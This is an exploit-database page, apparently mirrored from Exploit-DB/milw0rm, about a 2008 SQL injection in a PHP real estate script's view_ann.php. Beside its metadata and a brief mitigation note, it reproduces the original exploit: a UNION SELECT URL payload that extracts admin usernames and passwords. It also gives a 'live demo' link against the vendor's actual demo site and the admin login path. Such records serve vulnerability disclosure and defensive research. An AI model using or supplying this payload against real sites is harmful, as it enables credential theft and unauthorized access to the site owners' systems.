header-logo
Suggest Exploit
vendor:
Real Estate Script
by:
DeViL iRaQ
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Real Estate Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

The Real Estate Script ( view_ann.php ) SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This request contains an SQL query that is designed to extract sensitive information from the database. The attacker can then use this information to gain access to the application or to launch further attacks.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

#######################################################
# The Real Estate Script ( view_ann.php ) SQL Injection Vulnerability
#
# Author   : DeViL iRaQ
#
# Email     : guitar_lover46[at]yahoo[dot]com
#
# Price     : $399.99 (:
#
# Script Home Page : http://www.vastal.com/agent-zone-real-estate-script.html
#
# Demo      : http://www.vastal.com/real/
#
# Dork      : N/A
########################################################
# Exploit :
# www.[sitename].com/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
#
# Live Demo:
# http://www.vastal.com/real/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################
# Greetz :
#                      All members of the Forum  WwW.Hussin-X.CoM
#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
#########################################################

# milw0rm.com [2008-09-05]

Navigation

Suggest Exploit

Services By CQR